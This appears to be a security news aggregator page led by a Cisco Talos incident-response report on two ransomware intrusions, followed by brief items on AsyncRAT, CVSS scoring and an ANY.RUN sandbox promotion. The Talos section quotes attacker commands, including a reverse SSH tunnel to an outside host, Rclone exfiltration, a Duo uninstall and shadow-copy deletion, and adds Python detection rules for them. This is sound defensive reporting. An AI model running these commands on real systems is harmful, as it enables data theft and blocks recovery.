Talos IR ransomware engagements and the significance of timeliness in incident response

  • Cisco Talos routinely responds to ransomware engagements where the impact could have been mitigated or wholly prevented if the victim organization had initiated remediation efforts earlier in the attack lifecycle. The significance of early intervention in ransomware attacks is particularly exemplified by two recent Talos Incident Response (Talos IR) ransomware engagements. 
  • In one incident, the victim engaged Talos IR immediately after discovering malicious activity alerts. Talos IR worked swiftly to combat additional malicious activity and prevented the execution of any encryption in the environment. 
  • Conversely, in a second incident, the victim ignored alerts of malicious activity and did not contact Talos IR until after the ransomware binary began to execute. Talos IR was then not provided network access for analysis for over a day, during which time the actors achieved nearly 100% host encryption. 
  • While there are many factors that can impact the success and severity of a ransomware attack, such as an actor’s sophistication and advanced tooling, the close similarities between these two ransomware engagements led us to rule out these variables as significant drivers of the disparate outcomes between the two attacks. 

Introduction 


As ransomware threat actors continuously decrease their dwell time — here defined as the duration between initial access and encryption — it is increasingly imperative to be mindful of timeliness in incident response engagements (Infosecurity Magazine, CyberScoop, Orca, ThreatDown). Early intervention and remediation can significantly mitigate or even wholly prevent repercussions of ransomware attacks, such as financial loss, reputational damage and legal repercussions, as exemplified by a comparison of two recent Talos IR engagements.

In both these cases, the threat actors leveraged similar tools and tactics, techniques and procedures (TTPs) and the victim was alerted to suspicious activity prior to ransomware execution, yet one engagement resulted in 0% network encryption while the other victim experienced nearly 100% encryption.

Talos assesses that encryption occurred due to several time delays at pivotal moments. First, Talos was not employed to start an IR engagement until after the ransomware binary was executed, despite early warnings, which allowed the actor to initiate encryption. Then, Talos was provided network access over 30 hours after the engagement began, during which time the actors obtained widespread encryption. For context, according to Talos data, many ransomware variants can seize complete control of a network in just 24-48 hours after initial access. Furthermore, these delays also allowed the threat actor to employ defensive measures that severely limited Talos’ ability to retroactively analyze system logs, a crucial step toward remediating the threat and hardening the network.

Description of attack lifecycles  

Engagement 1: Data theft without encryption 

In late April, Chaos ransomware affiliates gained an initial foothold into a victim environment via social engineering. They sent a flood of spam emails to a single user, then contacted the user in Microsoft Teams masquerading as IT support. During the Microsoft Teams session, the adversary guided the user to launch Microsoft Quick Assist and enter their credentials into an unknown login page, which ultimately provided access to the account. That same day, the victim was alerted to the security breach and engaged Talos IR to mitigate the threat, allowing Talos IR to review activity logs before the adversary could completely delete or modify them. 

The affiliates relied heavily on living-off-the-land binaries (LoLBins) and dual-use tools to conduct post-compromise activity and leveraged Impacket’s “atexec.py” module, which executes commands remotely through the Task Scheduler service. They began exploring the victim’s environment using Windows command line utilities like “ipconfig /all” to list network interface configuration, “nltest /dclist” to list the domain controllers (DCs) within Active Directory (AD) and “quser.exe” to query information about user sessions. We also observed multiple outbound connections to adversary-controlled IP addresses using OpenSSH, an open-source suite of secure networking utilities that provide encrypted communication channels, to create a reverse proxy SSH connection: a tunnel initiated from inside the victim network that lets the adversary-controlled host relay traffic back into it.

C:\Windows\System32\OpenSSH\ssh.exe -R :12840 -N REDACTED -p 443 -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no

To move laterally within the environment, the adversary used Microsoft Remote Desktop and Advanced IP Scanner to obtain access to new accounts and maintained persistence by changing account passwords to lock users out.  

Notably, the actors used multiple remote monitoring and management (RMM) applications on different system tiers (e.g., workstations, servers and DCs) to ensure persistent remote access across multiple phases of the operation and to perform slightly different functions: 

  • Microsoft Quick Assist socially engineered the victim to install the tool for initial access. 
  • AnyDesk was likely the primary method of remote access as it was found on a majority of compromised systems. 
  • OptiTune was leveraged to deploy ScreenConnect RMM on a number of hosts. 
  • SplashTop was leveraged to enumerate activities on at least one host. 

They also took precautionary measures to evade detection, like uninstalling Duo from the host:

C:\WINDOWS\system32\cmd.EXE, /c, wmic, product, where, name=Duo Authentication for Windows Logon x64, call, uninstall, /nointeractive:

A renamed Rclone executable was run via the command line to copy files from a network share:

wininit.exe, copy, --max-age, 1y, --exclude, *{psd,7z,mox,pst,FIT,FIL,MOV,mdb,iso,exe,dll,wav,png,db,log,HEIC,dwg,tmp,vhdx,msi}, \\REDACTED\data, REDACTED/data, -q, --ignore-existing, --auto-confirm, --multi-thread-streams, 25, --transfers, 15, --b2-disable-checksum, -P

Finally, just hours after initial access, the adversary launched the script “backup.sh”, a normal process found on ESXi hosts. Talos IR suspects the adversary leveraged the script to deliver the ransomware executable. We observed attempts to encrypt data on the victim’s VPN that were ultimately unsuccessful.

Engagement 2: Nearly 100% encryption 

In the second engagement, the victim ignored alerts from Cisco’s Managed Detection and Response (MDR) of malicious activity and did not contact Talos IR until after the Medusa ransomware binary began to execute. Then, Talos IR was not provided network access for analysis for over a day, during which time the actors achieved nearly 100% host encryption.

A retroactive analysis of the limited logs that remained after encryption revealed the actors similarly relied on dual-use tools. For remote access they used SimpleHelp, a legitimate RMM tool that is commonly abused by ransomware actors and, since January 2025, has been routinely exploited for path traversal (CVE-2024-57727). Talos IR also observed several remote incoming desktop connections from suspicious IP addresses, beacon activity from the commonly abused Brute Ratel C4 (BRC4) red teaming tool, and Windows APIs invoked that could be leveraged for data collection:  

  • GetNativeSystemInfo determines the underlying hardware architecture and characteristics of a system, including the type of processor, number of processors and memory page size. 
  • Telemetry:api_invoke is the invocation of a telemetry API. Attackers may monitor or trigger api_invoke events to discover what APIs are available, which users or services call which APIs and which cloud services are used, leveraging the corresponding “telemetry:api_invoke” logs for environment enumeration. 
  • BCryptGenerateSymmetricKey generates symmetric keys, such as the AES keys used for decryption.

The adversary established command and control (C2) using JWrapper, a component of SimpleHelp that is often used by IT support and therefore may not be identified as malicious. JWrapper can also be leveraged to stealthily execute files and exfiltrate data, as it is designed to package Java applications into native executable formats for Windows, macOS and Linux. In this attack, the actors used it to execute a file that disabled the User Account Control (UAC) secure desktop prompt by setting the PromptOnSecureDesktop registry value to false:

C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access Bundle-00112084494\JWrapperTemp-1745261021-3-app\bin\windowslauncher.exe  
MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop

JWrapper was also likely used to exfiltrate data:

C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access Bundle-00112084494\JWrapperTemp-1745261021-3-app\bin\windowslauncher.exe

The actors gained unauthorized access to remotely read and modify files within the System32 folder, a critical part of the Windows OS containing essential files needed for the system to function properly, and attempted to delete volume shadow copies from the folder, a common tactic to inhibit data recovery:

C:\Windows\System32\vssadmin.exe 'delete' 'shadows' '/shadow={5aa57685-c258-4396-b702-6722ab58e603}'

They also executed Impacket in the System32 folder via PsExec remote copy and execution:

C:\Windows\system32\services.exe, C:\Windows\system32\msiexec.exe /V, C:\Windows\syswow64\MsiExec.exe -Embedding 27A094D718378410D2002AE3023D3731 E Global\MSI0000
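The command lines quoted in both engagements (the reverse SSH tunnel, the WMIC uninstall of Duo, the renamed Rclone copy, the vssadmin shadow-copy deletion and the PromptOnSecureDesktop change) are the kind of process-creation telemetry a defender can alert on before encryption begins. The Python below is an added example, not Talos IR tooling: it runs a small set of detection rules over constructed process events modelled on those command lines. Host names, the 203.0.113.10 address, the file server name and the GUID are constructed placeholders, and the reg.exe command is an assumed way of setting the registry value, since the text shows only the value path.

```python
"""Detection rules for the LoLBin and dual-use tool command lines seen in both
engagements. Added example, not Talos IR tooling; every event, host name,
address and GUID below is constructed."""
import ntpath
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    host: str
    image: str          # full Windows path of the process image
    command_line: str

RCLONE_FLAGS = ("--max-age", "--ignore-existing", "--auto-confirm",
                "--multi-thread-streams", "--transfers", "--b2-disable-checksum")
SECURITY_PRODUCTS = ("duo authentication",)   # extend with your own agents' names
SYSTEM_BINARIES = {"wininit.exe", "services.exe", "svchost.exe", "lsass.exe"}
SYSTEM32 = r"c:\windows\system32"

def image_name(ev):
    return ntpath.basename(ev.image).lower()

def reverse_ssh_tunnel(ev):
    """ssh.exe with a remote forward (-R) and host-key checking disabled."""
    cl = ev.command_line
    return (image_name(ev) == "ssh.exe" and re.search(r"(^|\s)-R\s", cl) is not None
            and ("StrictHostKeyChecking=no" in cl or "UserKnownHostsFile=/dev/null" in cl))

def security_tool_uninstall(ev):
    """WMIC 'product ... call uninstall' aimed at a known security agent."""
    cl = ev.command_line.lower()
    return ("wmic" in cl and "product" in cl and "call uninstall" in cl
            and any(p in cl for p in SECURITY_PRODUCTS))

def renamed_rclone(ev):
    """Two or more rclone-specific flags under an image not named rclone.exe."""
    if image_name(ev) == "rclone.exe":
        return False          # genuine rclone is an allow-listing question, not a rename
    return sum(flag in ev.command_line for flag in RCLONE_FLAGS) >= 2

def system_binary_masquerade(ev):
    """A core Windows binary name executing from outside System32."""
    return (image_name(ev) in SYSTEM_BINARIES
            and ntpath.dirname(ev.image).lower() != SYSTEM32)

def shadow_copy_deletion(ev):
    """vssadmin delete shadows, tolerating the quoting seen in EDR logs."""
    cl = re.sub(r"['\"]", "", ev.command_line)
    return (image_name(ev) == "vssadmin.exe"
            and re.search(r"\bdelete\s+shadows\b", cl, re.I) is not None)

def uac_secure_desktop_tamper(ev):
    """PromptOnSecureDesktop cleared, so UAC prompts leave the secure desktop."""
    cl = ev.command_line.lower()
    return ("promptonsecuredesktop" in cl
            and re.search(r"(/d\s+0\b|\b0x0\b|\bfalse\b)", cl) is not None)

RULES = {f.__name__: f for f in (reverse_ssh_tunnel, security_tool_uninstall, renamed_rclone,
                                 system_binary_masquerade, shadow_copy_deletion,
                                 uac_secure_desktop_tamper)}

def scan_events(events):
    """One hit per (rule, event) match; a single event may trip several rules."""
    return [{"rule": name, "host": ev.host, "image": ev.image}
            for ev in events for name, rule in RULES.items() if rule(ev)]

# Constructed events modelled on the command lines quoted in the text.
SAMPLE_EVENTS = [
    ProcEvent("WS01", r"C:\Windows\System32\OpenSSH\ssh.exe",
              "ssh.exe -R :12840 -N user@203.0.113.10 -p 443 "
              "-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no"),
    ProcEvent("WS01", r"C:\WINDOWS\system32\cmd.EXE",
              'cmd.EXE /c wmic product where name="Duo Authentication for Windows '
              'Logon x64" call uninstall /nointeractive'),
    ProcEvent("FS02", r"C:\Users\Public\wininit.exe",          # renamed rclone
              r"wininit.exe copy --max-age 1y \\fileserver\data remote:/data -q "
              "--ignore-existing --auto-confirm --multi-thread-streams 25 "
              "--transfers 15 --b2-disable-checksum -P"),
    ProcEvent("DC01", r"C:\Windows\System32\vssadmin.exe",
              "vssadmin.exe 'delete' 'shadows' "
              "'/shadow={00000000-0000-0000-0000-000000000000}'"),
    ProcEvent("WS05", r"C:\Windows\System32\reg.exe",          # assumed setter for the value
              r"reg.exe add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System "
              "/v PromptOnSecureDesktop /t REG_DWORD /d 0 /f"),
    ProcEvent("WS03", r"C:\Windows\System32\ipconfig.exe", "ipconfig /all"),   # benign
    ProcEvent("WS03", r"C:\Windows\System32\wininit.exe", "wininit.exe"),       # genuine
    ProcEvent("WS04", r"C:\Windows\System32\OpenSSH\ssh.exe", "ssh.exe admin@jumphost"),
]

if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print(f'{hit["host"]:5} {hit["rule"]:26} {hit["image"]}')
```

The renamed-Rclone rule keys on the tool's flag vocabulary rather than the file name, which is what survives a rename; pairing it with the System32 masquerade rule catches the wininit.exe trick from two independent angles, so a single miss does not lose the event.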

Analysis

Talos IR assesses that victim response time was the dominant factor that caused the discrepancy in impact. All other factors were remarkably similar, such as the actor’s level of sophistication, the victims’ endpoint security and Talos IR’s response. In both attacks, the affiliates displayed a similar level of sophistication in their tools, heavily using LoLBins and dual-use tools throughout the attack lifecycle. Examples include shared use of the Msiexec, WMIC and PowerShell LoLBins and of legitimate RMM tools. Both actors also used Impacket to execute commands remotely over SMB or WMI without deploying new payloads and used ADMIN$ administrative shares to propagate malware. A more sophisticated actor may have opted to use custom malware, similar to the recently discovered Betruger backdoor, which is rarely seen in ransomware attacks.

In both cases, the actors also used similarly sophisticated TTPs to obtain widespread network access. They attempted to evade detection and analysis by deleting or modifying files, logs, and tools, and they were able to compromise the victims’ System32 folder and administrative accounts.

While Talos IR acknowledges that there are a few minor differences between these two engagements, these would not indicate a significant disparity. For example, the actors used different paid legitimate software to scan IPs and different RMM tools, but this would not have played any significant role in the impact to the victim.

We also observed that both victims had a similar flaw in endpoint hygiene by using the outdated PowerShell version 1.0 that was exploited by both threat actors. PowerShell 1.0 lacks several critical security features present in later iterations, making it difficult to detect and analyze malicious activity. For instance, the PowerShell 1.0 execution policy can be easily bypassed using inline execution “powershell.exe -ExecutionPolicy Bypass” or by modifying policy values in memory or the registry. This means scripts can be run without being digitally signed or verified, a common vector for ransomware payloads. Additionally, PowerShell 1.0 does not support Constrained Language Mode (CLM), which in later versions restricts access to .NET classes and APIs that can be exploited for lateral movement or privilege escalation. Without CLM, an attacker gains unrestricted access to the full breadth of PowerShell’s capabilities, including registry manipulation, WMI queries, COM object interaction and raw .NET assembly loading — all of which can be used to establish persistence or elevate privileges.

Finally, both victims received notifications of malicious activity prior to ransomware execution and, once the victims chose to engage Talos, we provided the same level of assistance. 

Timely log analysis enables quick recovery 

Early engagement with one of the victims and continued communication throughout allowed Talos IR to access the system logs before they could be deleted or modified, which likely helped the victim avoid encryption. Logs are a crucial component of remediating ransomware engagements for many reasons: 

  • Identifying weaknesses in network security that the actor exploited so they can be fixed 
  • Understanding what data was compromised so the victim can understand the potential fallout and notify the affected customers 
  • Establishing a baseline to help easily identify anomalies that indicate suspicious behavior (particularly important considering many ransomware affiliates leverage legitimate tools) 
  • Identifying adversary’s routine tools and TTPs to know how to identify future malicious activity, where to place detection systems to prevent future malicious activity and potentially attribute the activity to a particular actor 
  • Determining the actor’s goal (e.g., financial theft or espionage) to protect data the actor is likely trying to access 
  • Observing a clear path indicating a certain target will be compromised, or viewing failed attempts at a compromise, to preemptively harden the target 

While Talos IR provided some similar remediation recommendations for each victim due to overlaps in activity, the victim that waited to engage Talos IR received more general recommendations because they had limited logs to review, preventing Talos from understanding the full scope of malicious activity that occurred and how the adversary was able to compromise their network.

 

Recommendations based on limited access to logs vs. tailored recommendations based on logs 

Protect against malicious use of RMM software 
  • Limited access to logs: Only allow RMM software that is allowed by the company. All other RMMs should be blocked. 
  • Tailored, based on logs: Based on the malicious SSH remote connection, make sure malicious IPs are blocked. Also consider blocking SSH at the firewall level. 

Secure passwords 
  • Limited access to logs: Conduct a full password reset for all accounts, including all privileged accounts, service accounts, user accounts and local accounts. 
  • Tailored, based on logs: Adversaries had access to hosts, which gave them access to the unencrypted data stored in their browsers. To help prevent this in the future, implement GPOs to prevent users from storing credentials and PII in browsers. 

Bar the adversary from moving laterally 
  • Limited access to logs: No recommendations provided due to limited visibility. 
  • Tailored, based on logs: Consider migrating to Entra ID instead of the hybrid AD approach, as this would have helped prevent the adversary’s lateral movement in the environment. 

Recommendations 

  • Raise awareness of phishing and social engineering. Given ransomware actors’ proficiency in using a wide array of techniques to obtain initial access, user education is a key part of spotting phishing attempts, countering MFA bypass techniques and knowing where to report unauthorized access attempts.  
  • Monitor and prevent unnecessary and/or unauthorized use of system administration tools, such as PowerShell, and adhere to zero trust principles. Restrict access to employees who need these tools for legitimate business purposes, and log and audit their use. 
  • Protect logs from modification or deletion. Consider creating service control policies (SCP) for cloud-based resources to prevent users or roles, across the organization, from being able to access specific services or take specific actions within services. For example, the SCP can be used to restrict users from being able to delete logs, update virtual private cloud (VPC) configurations and change log configurations. Additionally, log process execution events and deploy Sysmon to enhance logging capabilities on Windows devices. 
  • Restrict the use of RMM and dual-use tools. Review logs for execution of RMM software to detect abnormal use, such as RMM software only being loaded in memory, and block both inbound and outbound connections on common RMM ports and protocols at the network perimeter. 
  • Employ data loss prevention (DLP) strategies to prevent unauthorized disclosure or leakage. These include data classification policies, data handling policies, user awareness and training and DLP software that can identify and block unauthorized data transfer attempts.

Protections   

Chaos 
  • Signatures: Unix.Malware.Chaos-6474834-0, Unix.Malware.Chaos-6474902-0 
  • Rule IDs: 45975 

Medusa 
  • Rule IDs: 63929, 63928, 300998, 33058-33060 
  • Signatures: Andr.Ransomware.Medusa-10033530-0, PUA.Win.Tool.BestCrypt-10033531-0, Win.Ransomware.Medusa_Note-10033532-0

Indicators of compromise (IOCs) 

Chaos 

Filename | SHA256 | Status/Description 
Wavesor.exe | 19ab3c8645d6806ae8a1dad707a86aba344a48d1612aeb5aa145f96ac0e24a03 | Malware that can be used to capture critical information 
wininit.exe | 5540f27f12db5a9e954727079665a282f905a0be787b76d798ca79a318d197f5 | Renamed version of rclone 
Advanced_IP_Scanner_2.5.4594.1.exe | 26d5748ffe6bd95e3fee6ce184d388a1a681006dc23a0f08d53c083c593c193 | IP scanner used for discovery 
screensaver.exe | 87b3e3462263d7d42dea2bac6c3144181bab22092276f527a94a33af473066d5 | ScreenConnect 
otservice.exe | b5c63f895d27d0572289cb49058ea83b1e49c46a62ca51b4ab44d119111594a4 | OptiTune RMM used to deploy ScreenConnect 
supportcenter.exe | 1ede8d91db625a605535488d1c36a5ea7ba3950194cabe7664ffa7ed6a9aab45 | OptiTune RMM 
bvscript.exe | 9d2fe8a4a229ed2990e33a0330a00c03a415435c3cabd9a42dd882673522bee4 | OptiTune RMM Bravura Script Host tool 
otpowershell.exe | 10a87144386b2869d1bbc40e50f6960d4eb4316d1fd1c1df8708361a7b837b98 | OptiTune PowerShell tool 
remoteservice.exe | 4b6ff966ec6509e86c4a1cbf71d71bf434e08e0aae097a57015ad493db4a3912 | OptiTune Remote Service tool 
realtimeagent.exe | 6a3072a2367329b564c9bf77302a5fbf66673fb471c22fc56a12e901c4d90477 | OptiTune Real Time Agent tool 
advanced_ip_scanner.exe | 4b036cc9930bb42454172f888b8fde1087797fc0c9d31ab546748bd2496bd3e5 | IP scanner used for discovery 
goodsync.exe | 8127614d1906befc82ebc75fc0992e7dbad64ed2233fe316df611bf89ac4df2e | Data exfiltration tool 
screenconnect.exe | 05016485b683ef6d40bfd805702924909197ee2483a66ffc8a22dc03e4891045 | Unknown executable placed on host ‘PKIWEBSVR’ 
syncro.installer.exe | 845f4d73a0d96898535593c411d924d8c8c3af1dd3ead5f824242bb841d53c8e | Syncro RMM installer 
setuputil.exe | 1837087e75de428c18acec7f2ef7576752396a3a1ef15450230734e9ee194b28 | Splashtop Streamer installer 
anydesk.exe | 6ccea6a959128112613d7a82c067f8ccc78f05f1f8f47348fc9fecf269f0f21a | Malicious use of AnyDesk 
QuickAssist.exe (ms-quick-assist) | 8f67faad634acf0f2971caf8b7ac96e8f05de795b74feec8b82ea168b7be820b | Executable that “patient zero” was socially engineered into running 
splashtop.exe | 03a613c62ae7470e70e0197ea5133625308dc2ac2c5574608d2b6e20c8f94015 | Splashtop 
splashtop_sos.exe | 61f281c24846d311031521d13c933c42b33c7283d425456f00cf0ef3ffb04863 | Splashtop 

Domain, URI Path, or IP Address | Status/Description 
144.172.103[.]42 | Adversary controlled IP address used to establish a reverse proxy SSH connection 
45.61.134[.]36 | Adversary controlled IP address used to establish a reverse proxy SSH connection 
civicoscolombia[.]com | Domain with malicious reputation and signs of potential data exfiltration 
104.21.44[.]57 | IP for malicious domain civicoscolombia[.]com 

Medusa 

Filename | SHA256 | Status/Description 
windowslauncher.exe / remote access.exe | 11e7f8b671ed39497c8561b0ecd13496080681c21a457d6079817a90de553bf1 | SimpleHelp Remote Access Client 
storm.exe | ee6d24410a8cf31d672d2a47466b76ad287c7ba016d3711490f0f607b1dc0be3 | SimpleHelp Remote Access Client 
psexecsvc.exe | cc14df781475ef0f3f2c441d03a622ea67cd86967526f8758ead6f45174db78e | Microsoft Sysinternals PsExec 
Remote AccessLauncher.exe | 1e43e202a6e5d3059c3901a63fd69b32a7c0719c9f4c4f592a71c85e08e5d188 | SimpleHelp Remote Access Client 
session_win.exe | 6e5f719d4c319e6aab1440f149d8d1dcb512a8f558b62311a0a5d5af366074ff | SimpleHelp Remote Access Client 
ipscan-win64-3.0-beta6.exe | 8c1ec962a5e01d8717f6391af96c973600797c5285bcac1ac939a8d59e40e64e | Angry IP Scanner 
remote access service.exe | dfee42845dd0ba873411df0ea1a917a7f2c1ddd9c024d325ce76aea90a9c9c51 | SimpleHelp Remote Access Client 
remote access service.exe | 733fc3b203e9b46d1dd8bfdeea3efd2adc569ef6806bdc15b077623670ad52e1 | SimpleHelp Remote Access Client 
remote access service.exe | 34df37643dab68d3d3b36c415b6b9fd1842c475c088007081ee613a780fd1c2c | SimpleHelp Remote Access Client 
winpty-agent64.exe | 586a2d7d3092b364db3cbb5a7dbc83cf7ef233338c4172c1bae6587f8b374cab | SimpleHelp utility to manage terminal connections 

Domain, URI Path, or IP Address | Status/Description 
213.183.63[.]41 | Command and control SimpleHelp remote access IP address 
89.36.161[.]17 | Command and control SimpleHelp remote access IP address 
143.110.243[.]154 | Suspected data exfiltration IP address 

Source: Cisco Talos Blog

Unmasking AsyncRAT: Navigating the labyrinth of forks

ESET researchers map out the labyrinthine relationships among the vast hierarchy of AsyncRAT variants

Source: WeLiveSecurity

What you need to know about CVSS to protect your IT assets

This year marks the 20th anniversary of the Common Vulnerability Scoring System (CVSS), which has become a widely accepted standard for describing software vulnerabilities. Despite decades of use and four generations of the standard — now at version 4.0 — CVSS scoring rules continue to be misused, and the system itself remains the subject of intense debate. So, what do you need to know about CVSS to effectively protect your IT assets?

The CVSS Base Score

According to its developers, CVSS is a tool for describing the characteristics and severity of software vulnerabilities. CVSS is maintained by the Forum of Incident Response and Security Teams (FIRST). It was created to help experts speak a common language about vulnerabilities, and to facilitate automatic processing of data on software flaws. Almost every vulnerability published in major vulnerability registries like CVE, EUVD, or CNNVD includes a severity assessment based on the CVSS scale.

An assessment typically consists of two main parts:

  • A numerical rating (CVSS score), which shows how severe the vulnerability is on a scale from 0 to 10. A score of 10 means it’s an extremely dangerous, critical vulnerability.
  • A vector, which is a standardized text string that describes the vulnerability’s key characteristics. This includes details like whether it can be exploited remotely over a network or only locally, if elevated privileges are needed, how complex it is to exploit, and what aspects (such as availability, integrity, or confidentiality) of the vulnerable system are affected by exploitation.

Here’s an example using the highly severe and actively exploited vulnerability CVE-2021-44228 (Log4Shell): Base Score 10.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

Let’s break that down: the attack vector is network-based, attack complexity is low, privileges required: none, user interaction isn’t required, the scope indicates the vulnerability impacts other system components, and the impact on confidentiality, integrity, and availability is high. Detailed descriptions of each component are available in the CVSS 3.1 and CVSS 4.0 specifications.

A crucial part of the CVSS system is its scoring methodology — also known as the calculator, and available for both 4.0 and 3.1. By filling in all the vector components, you can automatically get a numerical criticality score.

The original CVSS calculation methodology included three metric groups: Base, Temporal, and Environmental. The first group covers the fundamental and unchanging characteristics of a vulnerability, and forms the basis for calculating the CVSS Base Score. The second group includes characteristics that can change over time — such as the availability of published exploit code. The third group is designed for internal organizational use to account for context-specific factors like the vulnerable application’s scope or the presence of mitigating security controls in the organization’s infrastructure. In CVSS 4.0, the Temporal metrics have evolved into Threat metrics, and a new group of Supplemental metrics has been introduced.

Here’s how the metrics are interconnected. Software vendors or cybersecurity companies typically assess the Base criticality of a vulnerability (referred to as “CVSS-B” in the 4.0 specification). They also often provide an assessment related to the availability and public disclosure of an exploit (CVSS-BT in 4.0, and Temporal in 3.1). This assessment is a modified Base Score; therefore CVSS-B can be higher or lower than CVSS-BT. As for the Environmental score (CVSS-BTE), it’s calculated within a specific organization based on the CVSS-BT, with adjustments made for their unique conditions of using the vulnerable software.

The Evolution of CVSS

The first two versions of CVSS, released in 2005 and 2007, are hardly used today. While you might still find older CVSS scores for modern vulnerabilities, CVSS 3.1 (2019) and CVSS 4.0 (2023) are the most common scoring systems. However, many software vendors and vulnerability registries aren’t in a rush to adopt version 4.0, and they continue to provide CVSS 3.1 scores.

The core idea behind the first CVSS version was to quantify the severity of vulnerabilities via a scoring system — with an initial separation into Base, Temporal, and Environmental metrics. At that stage, the textual descriptions were loosely formalized, and the three groups of metrics were calculated independently.

CVSS 2.0 introduced a standardized vector string and a new logic: a mandatory and unchangeable Base score, a Temporal score calculated from the Base score but accounting for changing factors, and an Environmental score used within specific organizations and conditions derived from either the Base or Temporal score.

Versions 3.0 and 3.1 added the concept of Scope (impact on other system components). They also more precisely defined parameters related to required privileges and user interaction, and they generalized and refined the values of many parameters. Most importantly, these versions attempted to solidify the fact that CVSS measures the severity of a vulnerability — not the risks it creates.

In version 4.0, the creators aimed to make the CVSS metric more useful for business-level assessments of how vulnerabilities impact risk. This is still not a risk metric, though. Attack complexity was split into two distinct components: attack requirements and attack complexity. This highlights the difference between the inherent engineering difficulty of an attack and the external factors or conditions necessary for the attack to succeed. In practical terms, this means a flaw that requires a specific, non-default configuration on the vulnerable product to be exploited will have higher attack requirements and, consequently, a lower overall CVSS score.

The often-misunderstood Scope metric, which simply offered “yes” or “no” options for “impact on other components”, has been replaced. Developers have introduced the clearer concept of “subsequent systems”, which now specifies what aspect of their operation the vulnerability affects. Additionally, a range of supporting indicators has been added — such as the automatability of an exploit and the impact of exploitation on human physical safety. The formulas themselves have also undergone substantial revisions. The influence of various components on the numerical threat score has been re-evaluated based on a vast database of vulnerabilities and real-world exploitation data.

How CVSS 4.0 is changing vulnerability prioritization

For cybersecurity professionals, CVSS 4.0 aims to be more practical and relevant to today’s realities. We’re facing tens of thousands of vulnerabilities — many of which receive a high CVSS score. This often leads to them being automatically flagged for immediate remediation in many organizations. The problem is, these lists are constantly growing, and the average time to fix a vulnerability is nearing seven months.

When vulnerabilities are re-evaluated from CVSS 3.1 to CVSS 4.0, the Base Score for defects with a severity between 4.0 and 9.0 tends to slightly increase. However, for vulnerabilities that were considered critically severe in CVSS 3.1, the score often remains unchanged or even decreases. More importantly, while Temporal metrics had little impact on a vulnerability’s numerical rating before, the influence of Threat and Environmental metrics is now much more significant. Orange Cyberdefense conducted a study to illustrate this. Imagine a company is tracking 8000 vulnerabilities, and their IT and security teams are required to fix all defects with a Base CVSS score above 8 within a specified timeframe. What percentage of these 8000 real-world vulnerabilities would fall into that category — with or without considering exposure of the exploit to the public (Temporal/Threat adjustment)? The study found that CVSS 4.0, in its base version, assigns a score of 8 or higher to a larger percentage of vulnerabilities (33% compared to 18% in version 3.1). However, when adjusted for the availability of exploits, this number drops significantly — leaving fewer truly critical flaws to prioritize (8% versus 10%).

Critical, High, and everything in between

What’s the difference between a “critical” vulnerability and one that’s just plain dangerous? A text-based severity description is part of the specification — but it’s not always required in a vulnerability description:

  • Low Severity: 0.1–3.9
  • Medium Severity: 4.0–6.9
  • High Severity: 7.0–8.9
  • Critical Severity: 9.0–10.0

In practice, many software vendors take a creative approach to these text descriptions. They might modify the names or incorporate their own assessments and factors not included in CVSS. A case in point is June’s Microsoft Patch Tuesday — specifically CVE-2025-33064 and CVE-2025-32710. The first is described as “Important” and the second as “Critical”, yet their CVSS 3.1 scores are 8.8 and 8.1, respectively.

Source: Kaspersky official blog

Enterprise Plan: Boost SOC Performance, Reduce Business Risks with ANY.RUN

Editor’s note: The current article was originally published on April 10, 2024, and updated on July 15, 2025.

Modern cybersecurity teams face growing pressure: more threats, tighter SLAs, and less time to investigate. The difference between fast containment and a damaging breach often comes down to visibility, collaboration, and control. 

ANY.RUN’s Enterprise plan is a complete malware analysis plan built for organizations that can’t afford to miss a threat. It combines interactive sandboxing, robust privacy settings, centralized team management, and flexible integrations.  

It provides SOCs with the full picture of every threat, helping them respond quickly and accurately, no matter the size or sector of your organization. 

Why Leading Security Teams Choose ANY.RUN’s Enterprise Plan 

ANY.RUN’s Interactive Sandbox is used by SOC teams for malware and phishing analysis 

Enterprise gives security teams all the essentials in a single, unified solution—from threat visibility and secure collaboration to automation and ecosystem integration. With a setup designed to fit into existing workflows, it removes bottlenecks and accelerates decision-making at every stage of investigation. 

The results speak for themselves: 

  • 90% of companies report higher detection rates after adopting ANY.RUN 
  • 95% say they resolve investigations significantly faster 
  • 80% of Fortune 100 companies rely on ANY.RUN in their security operations 
  • Trusted by 15,000+ organizations across finance, telecom, retail, government, and healthcare 

ANY.RUN helps teams cut through alert noise, validate threats faster, and stay ahead of what’s coming next. 

☝ Enterprise Plan:
  • Is for SOC teams and MSSPs
  • Offers all features, including teamwork and Automated Interactivity
  • Available for integration via API and SDK
  • Covers 5 or more seats

Real-World Success Stories: How Security Teams Win with ANY.RUN Enterprise 

ANY.RUN’s Enterprise plan is trusted by leading organizations to solve real problems, streamline operations, and stay ahead of threats. 

From managed security providers to financial institutions, more than 15,000 organizations around the world use Enterprise to improve visibility, accelerate response, and strengthen their security posture. 

Expertware Cuts Investigation Time by 50% with ANY.RUN Enterprise 

Expertware, a leading European IT consultancy, needed to accelerate investigations, reduce manual overhead, and deliver faster results to clients. With Enterprise, they achieved a 50% reduction in malware investigation turnaround time.

By replacing time-consuming manual setups with interactive sandboxing, Expertware improved visibility into complex threats, streamlined collaboration across their SOC, and scaled operations without adding overhead. 

Besides the faster investigation, Expertware achieved: 

  • Greater SOC efficiency: Interactive analysis and shared reports improved collaboration and reduced rework 
  • Deeper visibility: Full insight into multi-stage and fileless attacks, from macro execution to C2 communication 
  • Stronger client outcomes: Faster, clearer reporting helps clients respond before threats escalate 

Investment Bank Improves SOC Efficiency and Stops Ransomware with ANY.RUN Enterprise 

A Brussels-based investment bank adopted ANY.RUN’s Enterprise plan to overhaul its overloaded cybersecurity operations. Facing constant phishing and ransomware threats, their lean SOC team needed a solution that could speed up investigations, enhance visibility, and reduce manual work. 

With ANY.RUN, they replaced slow, manual triage processes with interactive sandboxing and automated analysis, allowing them to detect and contain attacks faster, without adding headcount. 

The combination of speed and knowledge allowed us to identify and prevent cyber attacks better than ever before.

Head of Cybersecurity, EU-based investment bank

